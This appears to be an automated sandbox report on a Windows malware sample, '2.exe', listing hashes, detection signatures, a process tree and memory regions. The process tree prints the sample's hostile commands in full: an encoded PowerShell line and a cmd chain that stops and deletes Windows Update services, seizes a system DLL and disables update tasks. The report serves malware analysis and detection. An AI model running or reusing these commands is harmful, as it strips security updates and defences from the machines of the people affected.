Analysis
-
max time kernel
299s -
max time network
270s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
24-10-2022 15:59
Behavioral task
behavioral1
Sample
2.exe
Resource
win7-20220812-en
General
-
Target
2.exe
-
Size
7.4MB
-
MD5
8ddc35d10e70c08abd8a15a787d3b586
-
SHA1
08219f2e68c5e72a7d218d63cea15bf8db5aff6c
-
SHA256
057e1aaca82b095ce425737bb5108155c8717868276e68a9fa93084850d2a585
-
SHA512
99046db0247aebc545daf5e5380a28edec47dffe0b9d036d504bff8616c7c39d2deaa088dac8fe779e497d9b060c76bcb423600426faa70e9ac896de342ed79a
-
SSDEEP
196608:qs7RTqMym+7SHwnuyFAHqEs4ezo22zS9nln606:T7Y11nu+cso2PlnQ
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
2.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2.exe -
Drops file in Drivers directory 1 IoCs
Processes:
conhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 1 IoCs
Processes:
explorer.exepid process 2040 explorer.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 2000 takeown.exe 896 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
2.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 2000 takeown.exe 896 icacls.exe -
Processes:
resource yara_rule behavioral1/memory/1784-54-0x0000000000400000-0x00000000010DC000-memory.dmp themida behavioral1/memory/1784-55-0x0000000000400000-0x00000000010DC000-memory.dmp themida behavioral1/memory/1784-57-0x0000000000400000-0x00000000010DC000-memory.dmp themida -
Processes:
2.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
2.exepid process 1784 2.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 240 set thread context of 2040 240 conhost.exe explorer.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1556 sc.exe 1416 sc.exe 1900 sc.exe 1068 sc.exe 440 sc.exe -
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1880 reg.exe 1468 reg.exe 836 reg.exe 1352 reg.exe 1584 reg.exe 316 reg.exe 1660 reg.exe 1588 reg.exe 1044 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeexplorer.exepid process 2012 powershell.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeexplorer.exedescription pid process Token: SeDebugPrivilege 2012 powershell.exe Token: SeShutdownPrivilege 1320 powercfg.exe Token: SeShutdownPrivilege 1348 powercfg.exe Token: SeShutdownPrivilege 1316 powercfg.exe Token: SeShutdownPrivilege 1540 powercfg.exe Token: SeTakeOwnershipPrivilege 2000 takeown.exe Token: SeLockMemoryPrivilege 2040 explorer.exe Token: SeLockMemoryPrivilege 2040 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2.execonhost.execmd.execmd.exedescription pid process target process PID 1784 wrote to memory of 240 1784 2.exe conhost.exe PID 1784 wrote to memory of 240 1784 2.exe conhost.exe PID 1784 wrote to memory of 240 1784 2.exe conhost.exe PID 1784 wrote to memory of 240 1784 2.exe conhost.exe PID 240 wrote to memory of 2012 240 conhost.exe powershell.exe PID 240 wrote to memory of 2012 240 conhost.exe powershell.exe PID 240 wrote to memory of 2012 240 conhost.exe powershell.exe PID 240 wrote to memory of 776 240 conhost.exe cmd.exe PID 240 wrote to memory of 776 240 conhost.exe cmd.exe PID 240 wrote to memory of 776 240 conhost.exe cmd.exe PID 240 wrote to memory of 580 240 conhost.exe cmd.exe PID 240 wrote to memory of 580 240 conhost.exe cmd.exe PID 240 wrote to memory of 580 240 conhost.exe cmd.exe PID 776 wrote to memory of 440 776 cmd.exe sc.exe PID 776 wrote to memory of 440 776 cmd.exe sc.exe PID 776 wrote to memory of 440 776 cmd.exe sc.exe PID 776 wrote to memory of 1556 776 cmd.exe sc.exe PID 776 wrote to memory of 1556 776 cmd.exe sc.exe PID 776 wrote to memory of 1556 776 cmd.exe sc.exe PID 580 wrote to memory of 1320 580 cmd.exe powercfg.exe PID 580 wrote to memory of 1320 580 cmd.exe powercfg.exe PID 580 wrote to memory of 1320 580 cmd.exe powercfg.exe PID 776 wrote to memory of 1416 776 cmd.exe sc.exe PID 776 wrote to memory of 1416 776 cmd.exe sc.exe PID 776 wrote to memory of 1416 776 cmd.exe sc.exe PID 776 wrote to memory of 1900 776 cmd.exe sc.exe PID 776 wrote to memory of 1900 776 cmd.exe sc.exe PID 776 wrote to memory of 1900 776 cmd.exe sc.exe PID 580 wrote to memory of 1348 580 cmd.exe powercfg.exe PID 580 wrote to memory of 1348 580 cmd.exe powercfg.exe PID 580 wrote to memory of 1348 580 cmd.exe powercfg.exe PID 580 wrote to memory of 1316 580 cmd.exe powercfg.exe PID 580 wrote to memory of 1316 580 cmd.exe powercfg.exe PID 580 wrote to memory of 1316 580 cmd.exe powercfg.exe PID 776 wrote to memory of 1068 776 cmd.exe sc.exe PID 776 wrote to memory of 1068 776 cmd.exe sc.exe PID 776 wrote to memory of 1068 776 cmd.exe sc.exe PID 776 wrote to memory of 316 776 cmd.exe reg.exe PID 776 wrote to memory of 316 776 cmd.exe reg.exe PID 776 wrote to memory of 316 776 cmd.exe reg.exe PID 580 wrote to memory of 1540 580 cmd.exe powercfg.exe PID 580 wrote to memory of 1540 580 cmd.exe powercfg.exe PID 580 wrote to memory of 1540 580 cmd.exe powercfg.exe PID 776 wrote to memory of 1880 776 cmd.exe reg.exe PID 776 wrote to memory of 1880 776 cmd.exe reg.exe PID 776 wrote to memory of 1880 776 cmd.exe reg.exe PID 776 wrote to memory of 1468 776 cmd.exe reg.exe PID 776 wrote to memory of 1468 776 cmd.exe reg.exe PID 776 wrote to memory of 1468 776 cmd.exe reg.exe PID 776 wrote to memory of 836 776 cmd.exe reg.exe PID 776 wrote to memory of 836 776 cmd.exe reg.exe PID 776 wrote to memory of 836 776 cmd.exe reg.exe PID 776 wrote to memory of 1352 776 cmd.exe reg.exe PID 776 wrote to memory of 1352 776 cmd.exe reg.exe PID 776 wrote to memory of 1352 776 cmd.exe reg.exe PID 776 wrote to memory of 2000 776 cmd.exe takeown.exe PID 776 wrote to memory of 2000 776 cmd.exe takeown.exe PID 776 wrote to memory of 2000 776 cmd.exe takeown.exe PID 776 wrote to memory of 896 776 cmd.exe icacls.exe PID 776 wrote to memory of 896 776 cmd.exe icacls.exe PID 776 wrote to memory of 896 776 cmd.exe icacls.exe PID 776 wrote to memory of 1660 776 cmd.exe reg.exe PID 776 wrote to memory of 1660 776 cmd.exe reg.exe PID 776 wrote to memory of 1660 776 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\2.exe"2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbwBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAGsAdgBwAHEAIwA+ACAAQAAoACAAPAAjAHIAdgBhACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwB0AHUAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAdQBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG8AaQAjAD4A"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exeC:\Windows\explorer.exe aanewtbrhdbz1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/kRRORiyYEXQjlDWVnkLqznS8gWE6k3nXSMLi6nDwXFvazQSyw8+toWHTrnijZtUQ24/815/zhCZs1iAzqCrMGLeWXdJqAzh1OZvKAkAlE5F0/M1ZedWuCT9hZ79EApH/3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
\Users\Admin\AppData\Roaming\52D2.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/240-90-0x0000000000810000-0x000000000081A000-memory.dmpFilesize
40KB
-
memory/240-60-0x0000000000110000-0x000000000053B000-memory.dmpFilesize
4.2MB
-
memory/240-59-0x000000001BB20000-0x000000001BF4A000-memory.dmpFilesize
4.2MB
-
memory/240-61-0x000007FEFBA01000-0x000007FEFBA03000-memory.dmpFilesize
8KB
-
memory/316-79-0x0000000000000000-mapping.dmp
-
memory/440-71-0x0000000000000000-mapping.dmp
-
memory/580-70-0x0000000000000000-mapping.dmp
-
memory/776-69-0x0000000000000000-mapping.dmp
-
memory/836-83-0x0000000000000000-mapping.dmp
-
memory/896-86-0x0000000000000000-mapping.dmp
-
memory/956-99-0x0000000000000000-mapping.dmp
-
memory/1036-94-0x0000000000000000-mapping.dmp
-
memory/1044-91-0x0000000000000000-mapping.dmp
-
memory/1068-78-0x0000000000000000-mapping.dmp
-
memory/1216-93-0x0000000000000000-mapping.dmp
-
memory/1264-92-0x0000000000000000-mapping.dmp
-
memory/1316-77-0x0000000000000000-mapping.dmp
-
memory/1320-73-0x0000000000000000-mapping.dmp
-
memory/1348-76-0x0000000000000000-mapping.dmp
-
memory/1352-84-0x0000000000000000-mapping.dmp
-
memory/1416-74-0x0000000000000000-mapping.dmp
-
memory/1468-82-0x0000000000000000-mapping.dmp
-
memory/1540-80-0x0000000000000000-mapping.dmp
-
memory/1556-72-0x0000000000000000-mapping.dmp
-
memory/1584-89-0x0000000000000000-mapping.dmp
-
memory/1588-88-0x0000000000000000-mapping.dmp
-
memory/1660-87-0x0000000000000000-mapping.dmp
-
memory/1724-100-0x0000000000000000-mapping.dmp
-
memory/1784-58-0x0000000077180000-0x0000000077329000-memory.dmpFilesize
1.7MB
-
memory/1784-54-0x0000000000400000-0x00000000010DC000-memory.dmpFilesize
12.9MB
-
memory/1784-55-0x0000000000400000-0x00000000010DC000-memory.dmpFilesize
12.9MB
-
memory/1784-56-0x0000000077180000-0x0000000077329000-memory.dmpFilesize
1.7MB
-
memory/1784-57-0x0000000000400000-0x00000000010DC000-memory.dmpFilesize
12.9MB
-
memory/1880-81-0x0000000000000000-mapping.dmp
-
memory/1900-75-0x0000000000000000-mapping.dmp
-
memory/1980-101-0x0000000000000000-mapping.dmp
-
memory/2000-85-0x0000000000000000-mapping.dmp
-
memory/2012-62-0x0000000000000000-mapping.dmp
-
memory/2012-64-0x000007FEEDF20000-0x000007FEEE943000-memory.dmpFilesize
10.1MB
-
memory/2012-66-0x00000000026C4000-0x00000000026C7000-memory.dmpFilesize
12KB
-
memory/2012-65-0x000007FEED3C0000-0x000007FEEDF1D000-memory.dmpFilesize
11.4MB
-
memory/2012-67-0x00000000026C4000-0x00000000026C7000-memory.dmpFilesize
12KB
-
memory/2012-68-0x00000000026CB000-0x00000000026EA000-memory.dmpFilesize
124KB
-
memory/2020-98-0x0000000000000000-mapping.dmp
-
memory/2040-96-0x000000014035E514-mapping.dmp
-
memory/2040-97-0x00000000000E0000-0x0000000000100000-memory.dmpFilesize
128KB